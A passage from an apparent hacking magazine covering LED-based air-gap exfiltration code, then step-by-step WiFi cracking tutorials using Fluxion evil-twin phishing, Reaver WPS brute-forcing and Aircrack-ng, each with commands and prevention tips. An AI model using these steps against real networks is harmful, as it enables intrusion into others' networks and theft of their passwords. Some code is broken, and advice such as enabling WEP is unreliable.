more difficult threat to defend against.

New methods of communicating with air gapped networks are currently being exposed, some advanced and difficult to
mitigate. These newfound vulnerabilities have wide reaching implications on what we considered to be a foolproof
solution to network security – the placement of a physical air gap.

But it doesn’t stop there – new techniques of covertly getting information in and out of air gapped networks are being
exposed. Thus it is important not only to publicize these vectors of attack, but their countermeasures and feasibility as
well.

In this article, we will outline the steps an attacker must take in order to bridge an air gapped network. We will review
the state-of-the-art techniques over thermal, radio, and acoustic channels, and discuss each one’s countermeasures
and feasibility.

So, built on the idea to duplicate the human vision ability, a computer vision system uses electronic parts and
algorithms instead eyes and brain. The Open Source Computer Vision Library (OpenCV) is the most used library in
robotics to detect, track and understand the surrounding world captured by image sensors.

Find Objects with a Webcam (http://introlab.github.io/find-object/) – this tutorial

shows you how to detect and track any object captured by the camera using a simple
webcam mounted on a robot (or a drone for this purpose) and the Simple Qt interface
based on OpenCV.

For image tracking we find first where the LED is. The LED is on the NAS (or in the
keyboard, monitor, etc.), we then extract the blinking light to interpret binary and we
extract a binary string from there.

Remember our DS207 NAS isolated from internet? Well, once we infect it with our
malware (this article doesn’t cover infection techniques or social hacking), it will be ready
to start leaking information. DS207 NAS has a lot of controllable LEDs: Status, LAN,
HDD1, HDD2, USB Copy, Power and two buttons – Power and Reset.

Most of the LEDs are controlled by DSM, only the LAN LED is controlled directly by
Ethernet chip. HDD LEDs are controlled with IOCTL call to /dev/synobios with
SYNOIO_SET_DISK_LED. It is possible to switch these LEDs between

OFF/GREEN/GREEN_BLINK/ORANGE/ORANGE_BLINK modes.

List of the available commands:

70
 New Hacking Era: Wireless Hacking By Drones
UART2_CMD_LED_POWER_ON 0x34 Power LED on
UART2_CMD_LED_POWER_BLINK 0x35 Power LED blink
UART2_CMD_LED_POWER_OFF 0x36 Power LED off
UART2_CMD_LED_HD_OFF 0x37 Status LED off
UART2_CMD_LED_HD_GS 0x38 Status LED green
UART2_CMD_LED_HD_GB 0x39 Status LED green blinking
UART2_CMD_LED_HD_AS 0x3A Status LED orange
UART2_CMD_LED_HD_AB 0x3B Status LED orange blinking

In order to turn LEDs OFF:

turn-leds-off.sh

#!/bin/sh

printf \\x36 > /dev/ttyS1 # UART2_CMD_LED_POWER_OFF

printf \\x37 > /dev/ttyS1 # UART2_CMD_LED_HD_OFF
printf \\x42 > /dev/ttyS1 # UART2_CMD_LED_USB_OFF
printf \\x4B > /dev/ttyS1 # UART2_CMD_LED_10G_LAN_OFF
printf \\x50 > /dev/ttyS1 # UART2_CMD_LED_MIRROR_OFF

In order to turn LEDs ON:

#!/bin/sh

printf \\x34 > /dev/ttyS1 # UART2_CMD_LED_POWER_ON

printf \\x38 > /dev/ttyS1 # UART2_CMD_LED_HD_GS
printf \\x40 > /dev/ttyS1 # UART2_CMD_LED_USB_ON
printf \\x4A > /dev/ttyS1 # UART2_CMD_LED_10G_LAN_ON
printf \\x51 > /dev/ttyS1 # UART2_CMD_LED_MIRROR_GS

Coding and decoding LED signals

First of all, a written text is converted to Morse code by a string extension, and finally, the generated Morse code is
used to control the LED and audio part. Check the code snippet below:

71
 New Hacking Era: Wireless Hacking By Drones
static class StringToMorse
{
//extension to string
public static string GetMorseCode(this string str)
{
string morse="";
foreach (char ch in str)
{
if (ch == 'a' || ch == 'A')
{
morse += ".- ";
}
else if (ch == 'b' || ch == 'B')
{
morse += "-... ";
}
else if (ch == 'c' || ch == 'C')
{
morse += "-.-. ";
}
// All alphabets not included
// It'd have made article unnecessarily big..
}
}

Now, once the Morse code is generated, the program calls a function asynchronously in a different thread to make the
LED flash the Morse without hanging the application. I'm using inpout32.dll to control the parallel port. You can find
the complete details about importing and using this DLL in the article I recommended above. Below is a code snippet
that uses the generated Morse code to flash the LED:

72
 New Hacking Era: Wireless Hacking By Drones
private void stringToLed(string str)//generated morse code is argument
{
foreach (char ch in str)
{
int mul_fac = Convert.ToInt16(comboBox1.Text);
richTextBox1.Text += ch;
int sleep = Convert.ToInt16(some value);//pause between dot and dash
if (ch == '.')
{
PortInterop.Output(888, 255); // set all data pins to 1
System.Threading.Thread.Sleep(on time of dot);
PortInterop.Output(888, 0);
System.Threading.Thread.Sleep(sleep);
}
else if (ch == '-')
{
PortInterop.Output(888, 255);
System.Threading.Thread.Sleep(on time for dash);
PortInterop.Output(888, 0);
System.Threading.Thread.Sleep(sleep);
}
else if (ch == '/')
{
PortInterop.Output(888, 0);// set all data pins to 0
System.Threading.Thread.Sleep(character pause);
}
else if (ch == ' ')
{
PortInterop.Output(888, 0);
System.Threading.Thread.Sleep(word pause);
}

}
}

Webcam and image processing...

To add more fun, I added another feature of decoding this Morse code. The program watches the on/off sequence of
the LED and converts it into English!
73
 New Hacking Era: Wireless Hacking By Drones

Earlier, I was thinking of processing the whole webcam frame and finding the on/ off state of the LED, but this
technique made the application work too slow that it couldn't even differentiate between a dot and a dash. So, I made
an assumption that the camera source will be stationary, and the user will have to define the light source by a mouse
click within the webcam window (see the image below: the point of interception of the two yellow lines is the marker
that defines the light source).

Once the light source is defined, the program can go through the pixels near the defined light source and calculate the
average brightness of each pixel.

using System.Drawing;
Color c = someBitmap.GetPixel(x,y);
float b = c.GetBrightness();

Wow, that's easy! This code was simple to write, and easy to understand. However, unfortunately, it is very slow. If you
use this code, it might take several milliseconds to process, because the GetPixel()/SetPixel() methods are too slow for
iterating through bitmaps. So, in this project, we'll make use of the BitmapData class in GDI+ to access the
information we want. BitmapData only allows us to access the data it stores through a pointer. This means that we'll
have to use the unsafe keyword to scope the block of code that accesses the data. Based on an article by Eric
Gunnerson, here's a class that will perform a very quick unsafe image processing:

74
 New Hacking Era: Wireless Hacking By Drones
using System;
using System.Collections.Generic;
using System.Linq;
using System.Windows.Forms;
using System.Drawing;
using System.Drawing.Imaging;
public unsafe class UnsafeBitmap
{
Bitmap bitmap;
int width;
BitmapData bitmapData = null;
Byte* pBase = null;

public UnsafeBitmap(Bitmap bitmap)

{
this.bitmap = new Bitmap(bitmap);
}

public UnsafeBitmap(int width, int height)

{
this.bitmap = new Bitmap(width, height, PixelFormat.Format24bppRgb);
}

public void Dispose()

{
bitmap.Dispose();
}

public Bitmap Bitmap

{
get
{
return (bitmap);
}
}

public struct PixelData

{
public byte blue;
public byte green;
75
public byte red;
 New Hacking Era: Wireless Hacking By Drones
public byte green;
public byte red;
}

private Point PixelSize

{
get
{
GraphicsUnit unit = GraphicsUnit.Pixel;
RectangleF bounds = bitmap.GetBounds(ref unit);

return new Point((int)bounds.Width, (int)bounds.Height);

}
}

public void LockBitmap()

{
GraphicsUnit unit = GraphicsUnit.Pixel;

RectangleF boundsF = bitmap.GetBounds(ref unit);

Rectangle bounds = new Rectangle((int)boundsF.X, (int)boundsF.Y,
(int)boundsF.Width, (int)boundsF.Height);

width = (int)boundsF.Width * sizeof(PixelData);

if (width % 4 != 0)
{
width = 4 * (width / 4 + 1);
}

bitmapData = bitmap.LockBits(bounds, ImageLockMode.ReadWrite,

PixelFormat.Format24bppRgb);
pBase = (Byte*)bitmapData.Scan0.ToPointer();
}

public PixelData GetPixel(int x, int y)

{
PixelData returnValue = *PixelAt(x, y);
return returnValue;
}
76
 New Hacking Era: Wireless Hacking By Drones
}

public void SetPixel(int x, int y, PixelData colour)

{
PixelData* pixel = PixelAt(x, y);
*pixel = colour;
}

public void UnlockBitmap()

{
bitmap.UnlockBits(bitmapData);
bitmapData = null;
pBase = null;
}

public PixelData* PixelAt(int x, int y)

{
return (PixelData*)(pBase + y * width + x * sizeof(PixelData));
}
}

Be sure to check Eric's article on unsafe image processing. This class can be used for retrieving the red, green, and blue
values of any pixel, as shown below:

77
 New Hacking Era: Wireless Hacking By Drones
private void GetBritnessOnce(ref Bitmap image)
{
// This code is for getting brightness only once !!
// pt is point defining light source
Rectangle rect = new Rectangle(pt.X - 3, pt.Y - 3, 6, 6);
//cropping image within boundaries of this rectangle
Bitmap img = image.Clone(rect, System.Drawing.Imaging.PixelFormat.Format24bppRgb);
UnsafeBitmap uBitmap = new UnsafeBitmap(img);//unsafe bitmap class
uBitmap.LockBitmap();
float avgBritness = 0;
for (int x = 0; x < 6; x++)
{
for (int y = 0; y < 6; y++)
{
byte red, green, blue;
red = uBitmap.GetPixel(x, y).red;
green = uBitmap.GetPixel(x, y).green;
blue = uBitmap.GetPixel(x, y).blue;
avgBritness += (299 * red + 587 * green + 114 * blue) / 1000;
// brightness function
}
}
avgBritness /= 36 ;
uBitmap.UnlockBitmap();
label19.Text = Convert.ToString(avgBritness);
}

With the brightness value, the program can find whether the light source is "on" or "off", and with a stopwatch, the
timings of on/off sequences could be calculated.

The program provides all the stats below the webcam view, and with these stats, it also predicts the Morse code! Make
sure to watch the video above.

Here, "dot" defines the time span for which the LED will remain on for every dot within the Morse code, and "DMF",
by default, is 3, which means the time span for every dash in the Morse code will be "dot" * 3.

Let's suppose we need to define " ._ " by flashing LEDs. How will we do that?

LED on for "LESS time" --> LED off for "SOME time" --> LED on for "MORE time"

This LED off for "SOME time" is what "Imm" is in the above settings.

Now, let's come to the settings for the decoding part. I'll soon add some AI so that the program will adapt itself after
78
 New Hacking Era: Wireless Hacking By Drones

collecting some on/off data.

For brightness less than the "Brightness Threshold", the light source will be considered "off". For best results, keep
this setting only a little less than the brightness of the light source in "on" state. Similarly, you can play with other
settings to get the best results. The program will provide all the statistics below the webcam window.

We have reached the end of this article, and I hope you enjoyed reading it. Now, here's some homework for you: try
implementing features like AI for the program, and make this program self-adaptive according to its environment. Use
your ideas, and if you end up doing something cool, I'd love to hear about it. :) Have fun!

About the author

Carlos Manzo Trujillo

Carlos Manzo Trujillo grew up in Mexico City (welcome to the jungle people), and frequented the

Universidad Nacional Autonoma de Mexico engineering faculty.

He spent fifteen years working (slaving away) in different

companies (like SAMSUNG and MICROSOFT) where he was

recognized with many TOP performance awards. After moving to

Sardina, Italy, (because he was in love with a gorgeous italian girl)

and working briefly as a developer team leader for NAD (he had

a cubicle) and a consultant for the International Parliament for

Safety and Peace, and non-profit group founded for the defense

and protection of peace to all people of the world, and for the

security of every nation (he didn’t even have a cubicle), he (finally)

finished his first IT article (that he’d been writing in his “spare time” for the last three months).

He currently lives in Sardinia (in the same town he got married — how weird is that? nothing weird at all

— and where he now feels like fits in) with his lovely wife and young daughter.

79
 New Hacking Era: Wireless Hacking By Drones

references
1. http://blogs.msdn.com/ericgu/archive/2007/06/20/lost-column-2-unsafe-image-processing.aspx
2. https://www.codeproject.com/Articles/46174/Computer-Vision-Decoding-a-Morse-Code-Flashing-
LED
3. http://wwwhome.cs.utwente.nl/~ptdeboer/ham/rscw/algorithm.html
4. https://smallhacks.wordpress.com/2012/04/17/working-with-synology-hardware-devsynobios-and-
devttys1/

80
WIFI HACKING

by Pprasoon Nigam
 WIFI Hacking

WIFI hacking, it's always been a hot topic for hackers (security testers) and techie guys. So let's start gaining a little
knowledge about it.

What is WI-FI?
Wi-Fi or WiFi is a technology for wireless local area networking with devices based on the IEEE 802.11 standards.
802.11 is the "radio frequency" needed to transmit Wi-Fi, it was defined by Vic Hayes who created the IEEE 802.11
committee. Wi-Fi is a trademark of the Wi-Fi Alliance, which restricts the use of the term Wi-Fi Certified to products
that successfully complete interoperability certification testing.

Devices that can use Wi-Fi technology include personal computers, video-game consoles, smart phones, digital
cameras, tablet computers, digital audio players and modern printers. Wi-Fi compatible devices can connect to the
Internet via a WLAN network and a wireless access point.

What is WIFI-Hacking?
Cracking of wireless networks is the defeating of security devices in wireless local-area networks. Wireless local-area
networks (WLANs), also called Wi-Fi networks, are inherently vulnerable to security lapses that wired networks are
exempt from.

Cracking is a kind of information network attack that is akin to a direct intrusion. There are two basic types of
vulnerabilities associated with WLANs: those caused by poor configuration and those caused by weak encryption.

Detailed Wireless Security Protocols: WEP, WPA, and WPA2

Wireless security protocols were developed to protect home wireless networks.
These wireless security protocols include:
● WEP
● WPA
● WPA2
each with their own strengths and weaknesses.

Wired Equivalent Privacy (WEP):

This is the original encryption protocol developed for wireless networks. As its name implies, WEP was designed to
provide the same level of security as wired networks. However, WEP has many well-known security flaws, is difficult
to configure, and is easily broken.

Wi-Fi Protected Access (WPA):

It was introduced as an interim security enhancement over WEP while the 802.11i wireless security standard was
being developed. Most current WPA implementations use a preshared key (PSK), commonly referred to as WPA
Personal, and the Temporal Key Integrity Protocol (TKIP, pronounced tee-kip) for encryption. WPA Enterprise uses
82
 WIFI Hacking

an authentication server to generate keys or certificates.

Wi-Fi Protected Access version 2 (WPA2):

This protocol is based on the 802.11i wireless security standard, which was finalized in 2004. The most significant
enhancement to WPA2 over WPA is the use of the Advanced Encryption Standard (AES) for encryption. The security
provided by AES is sufficient (and approved) for use by the U.S. government to encrypt information classified as top
secret — it’s probably good enough to protect your secrets as well!

About 802.11i
802.11i is a standard for wireless local area networks (WLANs) that provides improved encryption for networks that
use the popular 802.11a, 802.11b (which includes Wi-Fi) and 802.11g standards. The 802.11i standard requires new
encryption key protocols, known as Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard
(AES). The 802.11i standard was officially ratified by the IEEE in June of 2004, and thereby became part of the 802.11
family of wireless network specifications.

Security Modes of Routers

Security Rank Number of Characters
WEP
40/64-bit (10 characters)
(Wired Equivalent Basic
128-bit (26 characters)
Protocol)
WPA Personal
(Wi-Fi Protected Access Strong 8-63 characters
Personal)
WPA2 Personal
(Wi-Fi Protected Access 2 Strongest 8-63 characters
Personal)
WPA2: Strongest
WPA2/WPA Mixed Mode 8-63 characters
WPA: Strong

Security Issues:
● Weak password
● WPA packet spoofing and decryption
● WPS PIN recovery
● MS-CHAPv2
● Hole196

Detailed Security Issues

● Weak password

Pre-shared key WPA and WPA2 remain vulnerable to password cracking attacks if users rely on a weak password or

83
 WIFI Hacking

passphrase. To protect against a brute force attack, a truly random passphrase of 20 characters (selected from the set
of 95 permitted characters) is probably sufficient.

Brute forcing of simple passwords can be attempted using the Aircrack Suite starting from the four-way authentication
handshake exchanged during association or periodic re-authentication. To further protect against intrusion, the
network's SSID should not match any entry in the top 1,000 SSIDs as downloadable rainbow tables have been
pre-generated for them and a multitude of common passwords.

● WPA packet spoofing and decryption

The most recent and practical attack against WPA is by Mathy Vanhoef and Frank Piessens, who significantly
improved upon the WPA-TKIP attacks of Erik Tews and Martin Beck.They demonstrated how to inject an arbitrary
amount of packets, with each packet containing at most 112 bytes of payload. This was demonstrated by implementing
a port scanner, which can be executed against any client using WPA-TKIP. Additionally they showed how to decrypt
arbitrary packets sent to a client. They mentioned this can be used to hijack a TCP connection, allowing an attacker to
inject malicious JavaScript when the victim visits a website. In contrast, the Beck-Tews attack could only decrypt short
packets with mostly known content, such as ARP messages, and only allowed injection of 3 to 7 packets of at most 28
bytes. The Beck-Tews attack also requires Quality of Service (as defined in 802.11e) to be enabled, while the
Vanhoef-Piessens attack does not. Both attacks do not lead to recovery of the shared session key between the client
and Access Point. The authors say using a short rekeying interval can prevent some attacks but not all, and strongly
recommend switching from TKIP to AES-based CCMP.

The vulnerabilities of TKIP are significant in that WPA-TKIP had been held to be an extremely safe combination;
indeed, WPA-TKIP is still a configuration option upon a wide variety of wireless routing devices provided by many
hardware vendors. A survey in 2013 showed that 71% still allow usage of WPA, and 19% exclusively support WPA.

● WPS PIN recovery

A more serious security flaw was revealed in December 2011 by Stefan Viehbock that affects wireless routers with the
Wi-Fi Protected Setup (WPS) feature, regardless of which encryption method they use. Most recent models have this
feature and enable it by default. Many consumer Wi-Fi device manufacturers had taken steps to eliminate the
potential of weak passphrase choices by promoting alternative methods of automatically generating and distributing
strong keys when users add a new wireless adapter or appliance to a network. These methods include pushing buttons
on the devices or entering an 8-digit PIN.

The Wi-Fi Alliance standardized these methods as Wi-Fi Protected Setup; however, the PIN feature, as widely
implemented, introduced a major new security flaw. The flaw allows a remote attacker to recover the WPS PIN and,
with it, the router's WPA/WPA2 password in a few hours. Users have been urged to turn off the WPS feature, although
this may not be possible on some router models. Also note that the PIN is written on a label on most Wi-Fi routers

84
 WIFI Hacking

with WPS, and cannot be changed if compromised.

● MS-CHAPv2

Several weaknesses have been found in MS-CHAPv2, some of which severely reduce the complexity of brute-force
attacks, making them feasible with modern hardware. In 2012, the complexity of breaking MS-CHAPv2 was reduced
to that of breaking a single DES key, work by Moxie Marlinspike and Marsh Ray. Moxie advised: "Enterprises who are
depending on the mutual authentication properties of MS-CHAPv2 for connection to their WPA2 Radius servers
should immediately start migrating to something else.

● Hole196
Hole196 is a vulnerability in the WPA2 protocol that abuses the shared Group Temporal Key (GTK). It can be used to
conduct man-in-the-middle and denial-of-service attacks. However, it assumes that the attacker is already
authenticated against Access Point and thus in possession of the GTK.

LET GET OUR HANDS/SYSTEM WORKING

WIFI H@ck!ng with “Fluxion”

This article will be introducing a new method or cracking technique or script known as "Fluxion"

Tools Needed for H@ck!ng

● OS: Kali Linux
● Smart phone: Android/IOS
● Tool/Script Fluxion
● Most Important: Patience and Practice

What is Fluxion?
Fluxion is nothing but an advance script to crack Wifi passphrase. It's based on another script called "linset"(actually
it's not much different from linset, think of it as an improvement, with some bug fixes and additional options), using
something like a man in the middle attack/evil twin attack to get WPA password instead of going the
brute-force/dictionary route.

How it works:
● Scan the networks.
● Capture handshake (can't be used without a valid handshake, it's necessary to verify the password)
● Use WEB Interface
● Launches a FakeAP instance imitating the original access point
● A DHCP server is launched in FakeAP network

85
 WIFI Hacking

● Spawns a MDK3 process, which de-authenticates all users connected to the target network, so they can be made
to connect to the FakeAP and enter the WPA password.
● A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the
script
● A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
● Each submitted password is verified against the handshake captured earlier
● The attack will automatically terminate once correct password is submitted

Installation of Fluxion
As we know that Kali Linux doesn't have this tool pre-installed, installation is the first process.
Link to download Fluxion:
https://github.com/wi-fi-analyzer/fluxion
or
https://github.com/Hacker-Inside007/fluxion
(or search as per your compatibility)

Steps for Installation

1. Create a folder “fluxion” and save the fluxion script (Downloaded from the above given links)
2. Navigate to the folder
➡ Command : cd fluxion (or the name you have given the folder)
3. Run the script

Figure 1:”/fluxion” command entered in terminal

86
 WIFI Hacking

➡ Command : ./fluxion or sudo ./fluxion

4. By any chance you are getting a permission error, change the permission
➡ Command : chmod 755 fluxion (then try running the script again)
5. If you get any dependencies errors or warnings, try running the installer script
➡ Command : ./installer.sh or sudo ./installer .sh

Figure 2: “installer.sh” install all the dependencies and scripts into your OS KALI

6. When everything is installed absolutely fine then open fluxion

➡ Command : ./fluxion or sudo ./fluxion

Figure 3 : Main Page of Fluxion script

Now H@cK!nG Begins

Steps for hacking Wi-Fi password or passphrase

Step 1: As the main page welcomes you, it will ask to select language "English" (Please select language as per your
compatibility).

87
 WIFI Hacking

Step 2: Select your interface (will be option "1"), as soon as you select your interface the scanning process starts
(Terminal will open and close after 10 seconds) and it will show WIFI list.

Figure 4: Selecting interface to start monitoring WIFI signals with BSSID and ESSID

Step 3: Choose the WIFI(#> ID(any wifi ID from the list)).

Figure 5: WIFI list with their BSSID (MAC) and ESSID

Step 4: Choose option "1" (FakeAP – Hostapd).

88
 WIFI Hacking

Figure 6: Selecting option 1 “FakeAP”

Step 5: Now we will capture the handshake, so press "Enter".

Figure 7: Press “Enter” to start WPA Handshake

Step 6: Select option "1" (aircrack-ng) to capture the handshake (till you get "WPA handshake").

Figure 8: Select option “1” (aircrack-ng) for checking the handshake

89
 WIFI Hacking

Figure 9: As there is “No” handshake with the WIFI router, will start “Deauth all” for WPA handshake

Note: When “Handshake” has been captured, then select option “1” (check handshake)

Step 7: Use option "1" (Web Interface), it will offer Login pages in different languages

Figure 10: WPA handshake successfully done

90
 WIFI Hacking

Figure 11: Select Option “1”(Web Interface) for selecting language

Figure 12: Select option ”1” for creating fake login page in “English” and it will send it to the victim

Note: It's kind of a “phish” page, which is used to trick the victim.

After selecting the option for login page, you will see multiple windows popping up. DHCP and DNS requests are being
made and also with "status reporting window" with deauth window.

Note: It’s basically getting victims off the actual AP to fake AP.

91
 WIFI Hacking

Now in the smartphone you will see two networks with same name. Here is the part where the attacker has to get
lucky. If the victim opens the fake AP open network, they will be getting a fake login page to a wireless network. On
clicking, a page will open and it will ask for "Password". As soon as the victim enters the password of the the WIFI (say
it’s entering the passphrase of its own WIFI), and clicks on the "Submit" button and voilllaaaaa!!!! The password or
passphrase appears on the screen.

Figure 13: Password appears after clicking “Submit” button

Figure 14: Fake login page will appear in browser as soon as victim selects the “FakeAP” in their smart
phones

WIFI H@ck!ng with “Reaver”

What is Reaver?
Reaver is an open source tool that brute forces WPS (Wifi Protected Setup). This is the pin (usually printed on the
bottom of your router) that you can use to authenticate other devices to your wireless network without typing in a
password. With enough time, Reaver can crack this pin and reveal the WPA or WPA2 password.
92
 WIFI Hacking

What is WPS (Wifi Protected Setup)?

WPS stands for Wi-Fi Protected Setup and it is a wireless networking standard that tries to make connections between
a router and wireless devices faster and easier. It works only for wireless networks that have WPA Personal or WPA2
Personal security. WPS doesn't provide support for wireless networks using the deprecated WEP security.
Why are WPS pins vulnerable? Have a look at this paper =>
https://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf

How does it work?

Reaver has been designed to brute-force the WPA handshaking process remotely, even if the physical button hasn’t
been pressed on the access point.
Reaver exploits the pin code which then reveals the password.

Tools Needed for H@ck!ng

• OS: Kali Linux
• Tool/Script: Reaver
• Most Important: Patience and Practice

Now H@cK!nG begins

Steps for hacking WIFI password or passphrase

Step 1: Open terminal and check your WIFI interface.

➡ Command: airmon-ng

Figure 15: Checking Wireless Interface

Step 2: Start Monitoring mode of the interface.

➡ Command: airmon-ng start wlan0

93
 WIFI Hacking

Figure 16: Starting Monitoring of wireless interface

As we can see, many PID (process Ids) are running, which can interfere with our hacking, so let’s kill them.

Figure 17: PIDs are running

Step 3: Kill all process Ids.

➡ Command: kill (type all PIDs) for example: kill 2646 2750 and hit “Enter”.
Step 4: Now to check how many routers have their WPS locked or not.
➡ Command : wash -i mon0

94
 WIFI Hacking

Figure 18: Checking WPS PIN is locked or NOT

Step 5: Starting Reaver to attack WIFI router, brute-forcing WPS pin and getting password.
➡ Command: reaver -i mon0 -b [BSSID goes here] -d 30 -S -N -c 6 –vv

Figure 19: Reaver command for starting wifi hacking

Note: Cracking or retrieving passphrase time can vary system to system and strength of signal.

Sit back and have some coffee “Reaver” will do his work and present you with the passphrase.
Here we go with the passphrase or password of the WIFI router.
OK, so here we go with two good tools for WIFI hacking.

95
 WIFI Hacking

Figure 20: WIFI Password has been HACKED.

Prevention of WIFI getting hacked

It's not always true that WIFI can be hacked, we can make sure they are protected with some small things to be done.

A simple method:
CHECK YOUR WIRELESS ROUTER LIGHTS
Your wireless router should have indicator lights that show Internet connectivity, hardwired network connections, and
also any wireless activity, so one way you can see if anyone's using your network is to shut down all wireless devices
and go see if that wireless light is still blinking.

Second method:
CHECK YOUR WIRELESS ROUTER DEVICE LIGHTS
Your router's administrative console can help you find out more about your wireless network activity and change your
security settings. Go to your device list, it should provide a list of IP addresses, MAC addresses, and device names (if
detectable) that you can check against. Compare the connected devices to your gear to find any unwanted users.

96
 WIFI Hacking

Now, how to keep your WIFI safe from being hacked

Don't let strangers use your network

Password-protect your wireless connection. Turn on WEP (wired equivalency privacy) or WPA (Wi-Fi protected
access) on all of your devices, including your router, your media center, and your Microsoft Xbox entertainment
system.
• Make your password unique (like P@55w0rd@09)
• Have WPA2 password encryption which has best security and high, too
• Keep changing your password every 15 days or within a month.
• Keep your WPS PIN locked
Move your wireless router
Place the wireless access point away from windows and keep it near the center of your house to decrease the signal
strength outside of the intended coverage area.

Defend your computer

Keep all software current (including your web browser) with automatic updates. Make sure that your firewall is turned
on and use antivirus and antispyware software from a source that you trust.

Keep Your Logins Secure

It’s easy to disable the feature in your browser that automatically types in log-ins and passwords. In a public place, do
so as a best practice.

Check the internet/downloading speed

When you are downloading something, see if the download speed is low :: it may be your WIFI is being used by others
and the best way to check is an online test of internet speed.

So here we go with WIFI hacking and mitigation. Keep learning and Be Safe.

Note: Above article is for educational and security testing purpose only, to check your WIFI router’s vulnerability.

97
 WIFI Hacking

about the author

Pprasoon Nigam

Pprasoon Nigam has been working as a Security Consultant for the past

few years in many large organizations. He has been rewarded as an

“Ethical Hacker” and is also working on countermeasures on hacking for

the last few years to make people aware of hacking.

References
• http://prasoon-nigam.blogspot.in/2012/01/safe-ur-wifi-from-being-hacked.html
• http://www.dummies.com/computers/computer-networking/wireless/wireless-
security-protocols-wep-wpa-and-wpa2/
• https://en.wikipedia.org

98
WIRELESS HACKING
WITH AIRCRACK-NG

by Anthony Caldwell
 Wireless Hacking With Aircrack-ng

What you will learn

How to use the Aircrack-ng tool.

Aircrack-ng is a widely used tool with capabilities to crack WEP and WPA.

Introduction
Given our increasing need to stay connected via social media, email and, therefore, have access to the Internet, the
availability of free, open WiFi access points in institutions, shops and in some areas, city-wide access points has
become the norm. We don’t give a second thought to accessing a free WiFi spot in a coffee shop or otherwise since it
enables us to maintain access. But, what about our home? While you may have followed our best advice to select a
password for your router, implemented WPA/WPA2 encryption, it is possible, with help, to access these also. In this
article, we outline the use of a tool called ‘Aircrack-ng’ used by security professionals to access secured WiFi.

Cracking WEP Versus WPA

The approach used to crack the WPA/WPA2 pre-shared key versus WEP differ significantly. WEP can leverage
statistical methods to speed up the cracking process, however, only brute force techniques will work against
WPA/WPA2. In WPA/WPA2, the key is not static, so collecting (initial vectors) IVs (unlike WEP) does not speed up
the attack. The handshake between the access point and the attacker does reveal some information, though, when
handshaking is connecting a client to a network. It should be noted that a pre-shared key can be from 8 to 63
characters in length, making is impossible to crack the pre-shared key (Aircrack-ng, 2010).

Authentication is basically the same between WPA and WPA2. The objective is to capture the WPA/WPA2
authentication handshake and then use aircrack-ng to crack the pre-shared key.

Cracking WEP encryption

WEP, or Wired Equivalent Privacy, is an 802.11 standard used for encryption in Wireless LANs (IEEE, 2012). WEP
has two main functions, ensuring that traffic cannot be viewed by untrusted parties and preventing unauthorized
access to a network. The algorithm itself uses the RC4 cipher and 64-bit/128-bit keys to encrypt and decrypt and
ensure the integrity of the packets. Weaknesses in the key scheduling of the RC4 algorithm (Fluhrer, Mantin, &
Shamir, 2001) were first identified in 2001. Although RC4 is still secure when used with recommended methods, the
researchers discovered that when using RC4 with WEP that it is significantly weakened. WEP’s flaws include lack of
packet replay protection, weak packet integrity checks and the fact that it is possible to recover the key from a
collection of captured packets. Each WEP packet must be sent with a 4-byte header containing a one byte index
number and a three byte IV. WEP key recovery relies on capturing a large number of unique IV values.

Steps to Crack Wireless Signals using Aircrack-ng

Aircrack-ng offers a lot of helpful steps to use their tool. The first step is to start the wireless interface in monitor mode
(Aircrack, 2010) so put your card into what is called monitor mode. Monitor mode is the mode whereby your card can
listen to every packet in the air. Normally, your card will only “hear” packets addressed to you.

100
 Wireless Hacking With Aircrack-ng

‘airmon-ng’
By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally
deauthenticate a wireless client in a later step. The airmon-ng tool that comes packaged with the Aircrack-ng suite of
tools can be used to place a wireless adapter into monitor mode. To identify the wireless cards on the system run the
airmon-ng command with no arguments.

Figure 1 - Wireless Card

We can see in the example above that there is one wireless adapter called ‘wlan0’ associated with the physical interface
phy0. Next, we place this interface in ‘monitor mode’, simply run the command,

‘airmon-ng start wlan0’

Figure 2 - Wireless Card in Monitor Mode

The airmon-ng tool will create a monitor mode interface associated with the physical device used by the interface with
the name mon0.

The next step is to select a suitable access point (AP) or router from which to capture traffic. This can be done using
the Airodump-ng script with the specified interface.

‘airodump-ng’

Figure 3 - Airodump-ng Tool Capturing 802.11 Frames

Airodump-ng provides a great deal of information described in the table below:

101
 Wireless Hacking With Aircrack-ng

Header Detail

BSSID MAC address of the router/AP

PWR Signal Strength

CH Channel the AP is running on

Data Initialization Vectors (IV)

ENC Encryption used

ESSID Name of AP

The field that we are most interested in is Data or IV, as discussed, but many IVs are required. Once the AP has been
identified, the next step is to capture the packets and place them in a file for analysis. We use Airodump-ng, specifying
the channel, file to write to and the interface.

Figure 4 - Airodump-ng Captured Files

Although the frames are being captured we need to speed up the process because we need a large amount of IVs, and
this can be done by performing an ARP replay attack.

Figure 5 - ARP Replay Attack

Once the attack is initiated, the data/IV column will rise at a much quicker rate. A combination of aircrack-ng and the
capture file may now be used to launch the attack.

Figure 6 - Aircrack-ng WEP Password Crack

If the program does not have enough IVs, this may take repeated attempts. A successful crack will return the password
in hex form.
102
 Wireless Hacking With Aircrack-ng

Figure 7 - WEP Key Found

Cracking WPA-PSK encryption

This time, instead of trying to increase the data (IVs) in the WEP cracking the objective is to achieve a 4-way
handshake. It should be noted that in order for this attack to work, at least one client needs to be connected. The
reason for this is that to create a 4-way handshake the client needs to be first disconnected and then reconnected.
De-authenticating a client is done using,

‘aireplay-ng’

Figure 8 - De-authenticating a Client

With a successful WPA handshake the top right of the airodump-ng terminal looks like below,

Figure 9 - WPA Handshake Captured

103
 Wireless Hacking With Aircrack-ng

In this case, we brute force the password with aircrack-ng in combination with a password list.

‘aircrack-ng –w wordlist name-01.cap’

Figure 10 - BruteForce PSK

A penetration tester would use a combination of dictionary, mutated and compromised password lists.

Conclusion
As useful as the Aircrack-ng tool is in cracking wireless signals, it is a job that requires some patience and technical
ability and ultimately, if the password is not in your dictionary, it will not be found by Aircrack-ng either. Therefore,
the best advice is to select a better password or, better yet, passphrase.

104

about the author
Anthony Caldwell
Anthony Caldwell holds CEH and SSCP
certifications, works as an application
security analyst and independent security
researcher.
